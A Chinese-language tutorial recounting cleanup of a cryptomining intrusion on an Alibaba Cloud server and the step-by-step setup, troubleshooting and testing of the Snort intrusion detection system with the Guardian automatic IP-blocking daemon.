阿里雲服務器snort+guardian防護環境搭建

 

 

 

下面是故障過程原始版（歸納總結版請下載附件鏈接）

一：服務器被攻擊後解決措施

1. 獲取攻擊程序對應的源IP地址
2. 清空定時掃描任務
3. 清空異常ssh key
4. Redis設置密碼訪問（可選，待防禦系統建立後可以不用修改密碼）

5.挖礦查殺：yum -y install epel-release    yum -y install unhide
6.unhide quick 查看隱裂進程

7.iptables禁止原IP的出入

 

測試環境：

（snort+guard環境機）服務器1.1.1.1-------------------服務器2.2.2.2

 

二：安裝snort，防禦檢測
yum install https://www.snort.org/downloads/snort/snort-2.9.16-1.centos7.x86_64.rpm
yum install libdnet
shell輸入snort報錯：
snort: error while loading shared libraries: libdnet.1: cannot open shared object file: No such file or directory
發現libdnet.1在/usr/lib64下面，軟連接也是存在的。
export LD_LIBRARY_PATH=$LD_LIBRARY_PATH:/usr/lib64
運行snort還是報同樣的錯誤。

readelf -a snort查看到底依賴庫是什麼問題，發現elf中
0x000000000000000f (RPATH)              Library rpath: [/usr/local/lib]
指定了依賴庫的路徑在/usr/local/lib中，
所以拷貝/usr/lib64下面的libdnet.so.1.0.1到/usr/local/lib下，並建立軟連接 ln -s libdnet.so.1.0.1 libdnet.1

shell 輸入snort
啓動成功，初始化並各種檢側，提示告警：WARNING: No preprocessors configured for policy 0.
到此snort安裝運行成功。
下面創建snort規則數據庫：
進入官網下載rule包，rule包有三種，通用包，註冊包，發佈包（收費的）。
這裏用公司郵箱密碼註冊一個用戶，下載註冊包裏面的snortrules-snapshot-29160.tar.gz和版本對應。
snort規則數據庫安裝步驟：
1.mkdir /root/rule
  tar zxvf snortrules-snapshot-29160.tar.gz  //解壓後發現這個包裏所有規則和配置都被寫好了，後面我們自己定製規則再論
2.
cp -R -f /root/rule/preproc_rules /root/rule/rules /root/rule/so_rules /etc/snort
cp -R -f /root/rule/etc /etc/snort

三：配置snort
1.vim /etc/snort/snort.conf
  ipvar HOME_NET 1.1.1.1 //監視阿里雲真實網卡地址就是私網地址，因爲公網地址進來後始終轉換爲私網網卡地址
2.修改變量路徑
var LIB_PATH /usr/lib64
var CONF_PATH /etc/snort
var RULE_PATH $CONF_PATH/rules
var SO_RULE_PATH $CONF_PATH/so_rules
var PREPROC_RULE_PATH $CONF_PATH/preproc_rules
var WHITE_LIST_PATH $CONF_PATH/rules
var BLACK_LIST_PATH $CONF_PATH/rules
3.裁剪規則
  snort.conf中目前全部引入了我們下載的規則包裏的檢測規則，另外local.rules中空，我們暫時不添加額外的檢測規則
4.增加需要監視的網卡
  vim /etc/sysconfig/snort
INTERFACE=eth0  //阿里雲只有一個eth0物理網卡，其餘的容器雲的虛擬網橋docker0我們暫時不需要監視

5.啓動snort服務：service snortd start
查看service snortd status是否啓動成功，提示：
 snortd.service - SYSV: snort is a lightweight network intrusion detection tool that currently detects more than 1100 host and network vulnerabilities, portscans, backdoors, and more.
   Loaded: loaded (/etc/rc.d/init.d/snortd; bad; vendor preset: disabled)
   Active: active (exited) since Sat 2020-05-23 14:08:51 CST; 11s ago
     Docs: man:systemd-sysv-generator(8)
  Process: 3288 ExecStop=/etc/rc.d/init.d/snortd stop (code=exited, status=0/SUCCESS)
  Process: 3327 ExecStart=/etc/rc.d/init.d/snortd start (code=exited, status=0/SUCCESS)

May 23 14:08:51 znzz002 snort[3336]: 
May 23 14:08:51 znzz002 snort[3336]: PortVar 'SHELLCODE_PORTS' defined :
May 23 14:08:51 znzz002 snort[3336]:  [ 0:79 81:65535 ]
May 23 14:08:51 znzz002 snort[3336]: 
May 23 14:08:51 znzz002 snort[3336]: PortVar 'ORACLE_PORTS' defined :
May 23 14:08:51 znzz002 snort[3336]:  [ 1024:65535 ]
May 23 14:08:51 znzz002 snort[3336]: 
May 23 14:08:51 znzz002 snort[3336]: PortVar 'SSH_PORTS' defined :
May 23 14:08:51 znzz002 systemd[1]: Started SYSV: snort is a lightweight network intrusion detection tool that currently detects more than 1100 host and netw... and more..
May 23 14:08:51 znzz002 snortd[3327]: Starting snort: [FAILED]
Hint: Some lines were ellipsized, use -l to show in full.

因爲使用service啓動服務，所以查看cat /var/log/messages，提示：
May 23 14:26:17 localhost snort[5255]: FATAL ERROR: /etc/snort/snort.conf(259) Could not stat dynamic module path "/usr/lib64/snort_dynamicrules": No such file or directory.

find / -name snort_dynamicrules,缺少該文件。
mkdir -p /usr/lib64/snort_dynamicrules

重新啓動服務：繼續報錯
May 23 14:39:00 localhost snort[6528]: FATAL ERROR: /etc/snort/snort.conf(518) => Unable to open address file /etc/snort/../rules/white_list.rules, Error: No such file or directory
/etc/snort/rules/下手動創建white_list.rules，black_list.rules 內容爲空。
cd /etc/snort/rules
touch white_list.rules
touch black_list.rules

再次啓動成功。
[root@znzz002 lib64]# service snortd status
â— snortd.service - SYSV: snort is a lightweight network intrusion detection tool that currently detects more than 1100 host and network vulnerabilities, portscans, backdoors, and more.
   Loaded: loaded (/etc/rc.d/init.d/snortd; bad; vendor preset: disabled)
   Active: active (running) since Sat 2020-05-23 14:51:36 CST; 58s ago
     Docs: man:systemd-sysv-generator(8)
  Process: 7899 ExecStop=/etc/rc.d/init.d/snortd stop (code=exited, status=0/SUCCESS)
  Process: 5193 ExecReload=/etc/rc.d/init.d/snortd reload (code=exited, status=0/SUCCESS)
  Process: 7922 ExecStart=/etc/rc.d/init.d/snortd start (code=exited, status=0/SUCCESS)
    Tasks: 2
   Memory: 695.1M
   CGroup: /system.slice/snortd.service
           â””─7944 /usr/sbin/snort -A fast -b -d -D -i eth0 -u snort -g snort -c /etc/snort/snort.conf -l /var/log/snort

May 23 14:51:36 znzz002 snort[7944]:            Preprocessor Object: SF_SIP  Version 1.1  <Build 1>
May 23 14:51:36 znzz002 snort[7944]:            Preprocessor Object: SF_DNS  Version 1.1  <Build 4>
May 23 14:51:36 znzz002 snort[7944]:            Preprocessor Object: SF_DNP3  Version 1.1  <Build 1>
May 23 14:51:36 znzz002 snort[7944]:            Preprocessor Object: SF_IMAP  Version 1.0  <Build 1>
May 23 14:51:36 znzz002 snort[7944]:            Preprocessor Object: SF_DCERPC2  Version 1.0  <Build 3>
May 23 14:51:36 znzz002 snort[7944]:            Preprocessor Object: SF_FTPTELNET  Version 1.2  <Build 13>
May 23 14:51:36 znzz002 snort[7944]:            Preprocessor Object: SF_POP  Version 1.0  <Build 1>
May 23 14:51:36 znzz002 snort[7944]:            Preprocessor Object: SF_GTP  Version 1.1  <Build 1>
May 23 14:51:36 znzz002 snort[7944]:            Preprocessor Object: SF_SSLPP  Version 1.1  <Build 4>
May 23 14:51:36 znzz002 snort[7944]: Commencing packet processing (pid=7944)

[root@znzz002 lib64]# ps -aux |grep snort
snort     7944  0.0  8.9 801796 713560 ?       Ssl  14:51   0:00 /usr/sbin/snort -A fast -b -d -D -i eth0 -u snort -g snort -c /etc/snort/snort.conf -l /var/log/snort

6.測試
snort -T -i eth0 -c /etc/snort/snort.conf
提示：
Snort successfully validated the configuration!
Snort exiting
至此，snort成功運行。

再測試下規則：vim /etc/snort/rules/local.rules
alert icmp 2.2.2.2 any -> any any (msg:"snort test";sid:1000001;)
使用2.2.2.2ping本機地址，本機/var/log/snort/alert觸發告警。

7.查看攻擊告警日誌
tail -f /var/log/snort/alert

至此我們被動防禦檢測snort開源軟件部署結束。

三：安裝主動防禦系統Guardian
Guardian設計的原理：有個守護進程一直在監視/var/log/snort/alert，一旦有告警信息就會禁止該告警信息中的ip地址，過段時間自動解除禁止該IP地址。比人工維護的優勢在於，他發生在事前或入侵的第一步就禁止ip。人工維護肯定是在入侵成功後再行處理。
1.下載guardian-1.7.tar.gz 並解壓
  cp guardian.pl /usr/local/bin/      //執行文件
 cp scripts/iptables_block.sh /usr/local/bin/guardian_block.sh     //iptable禁止IP腳本
cp scripts/iptables_unblock.sh /usr/local/bin/guardian_unblock.sh  //iptables解禁IP腳本
cp guardian.conf /etc/snort/   //guardian配置文件
 touch /etc/snort/guardian.ignore  //對本文件中填寫的IP地址，不採取任何反應，有點白名單的味道
 touch /etc/snort/guardian.target  //本機需要保護的IP地址，譬如本機網卡有子接口，eth：0 ，eth：1,默認是eth：0，如果eth：1不填寫到本文件中，即使eth:1被攻擊snort產生alert文件，guardian也不會起反應
touch /etc/snort/guardian.log //日誌文件

2.配置/etc/snort/guardian.conf
HostIpAddr 1.1.1.1   //因爲是阿里雲軟件的網卡實際地址
Interface       eth0
LogFile         /var/log/snort/guardian.log
AlertFile       /var/log/snort/alert
IgnoreFile      /etc/snort/guardian.ignore
TargetFile      /etc/snort/guardian.target

3.創建啓動腳本
vim /usr/local/bin/guardian.sh

#!/bin/bash

cd /usr/local/bin

start()
{
  export PATH=$PATH:/usr/local/bin
  /usr/local/bin/guardian.pl -c/etc/snort/guardian.conf
}

stop()
{
   ps aux |grep 'guardian.pl *-c' 2>&1 > /dev/null
  if [ $? -eq 0 ];
  then 
  kill `ps aux |grep 'guardian.pl *-c' `
  else
  echo "guardian is not running ...."
  fi

}

status()
{
  ps aux |grep 'guardian.pl *-c' 2>&1 > /dev/null
  if [ $? -eq 0 ];
  then
  echo "guardian is running ...."
  else
  echo "guardian is not running ...."
  fi
}

case "$1" in
start)
start
;;

stop)
stop
;;

restart)
stop
start
;;

status)
status;;
*)

echo $"Usage: $0 {start|stop|restart|status}"
esac

運行該腳本：提示Can't locate getopts.pl
安裝yum -y install cpan
cpan Module::Build
cpan Perl4::CoreLibs
cp getopts.pl /usr/local/bin

再次執行guardian.sh start
報錯：
Warning! HostIpAddr is undefined! Attempting to guess..
Couldn't figure out the ip address
vim /etc/snort/guardian.conf中增加HostIpAddr 1.1.1.1

再次執行guardian.sh start提示：Warning! Logfile is not writeable! Engaging debug mode, output to STDOUT
創建log文件：touch /var/log/snort/guardian.log
再次啓動guardian.sh start, 啓動成功：
[root@znzz002 bin]# ./guardian.sh start
OS shows Linux
My ip address and interface are: 1.1.1.1       eth0
Loaded 0 addresses from /etc/snort/guardian.ignore
Loaded 0 addresses from /etc/snort/guardian.target
Becoming a daemon..

[root@znzz002 bin]# ps -aux |grep guardian
root     21013  0.0  0.0 132212  1588 pts/0    S    10:38   0:00 /usr/bin/perl /usr/local/bin/guardian.pl -c/etc/snort/guardian.conf
root     21052  0.0  0.0 112812   972 pts/0    S+   10:38   0:00 grep --color=auto guardian

下面將啓動服務，加入開機自啓動：
vim /etc/rc.d/rc.local
到此爲止：snort檢測和guardian防禦環境搭建完成

四：snort+guard聯動測試

（snort+guard環境機）服務器1.1.1.1-------------------服務器2.2.2.2

 

vim /etc/snort/guardian.target

輸入guardian監視的目標地址：1.1.1.1

vim /etc/snort/rules/local.rules //自定義告警規則

alert icmp 2.2.2.2 any -> any any (msg:"snort test";sid:1000001;)

 然後在2.2.2.2上ping1.1.1.1

發現第2包到第3包之後就丟棄了，所以是第3包開始丟棄 是因爲guardian監視進程掃描時間是1秒，所以在1秒內第二包會通過。第三包開始1.1.1.1的guardian使用iptables命令在INPUT階段drop了2.2.2.2過來的報文。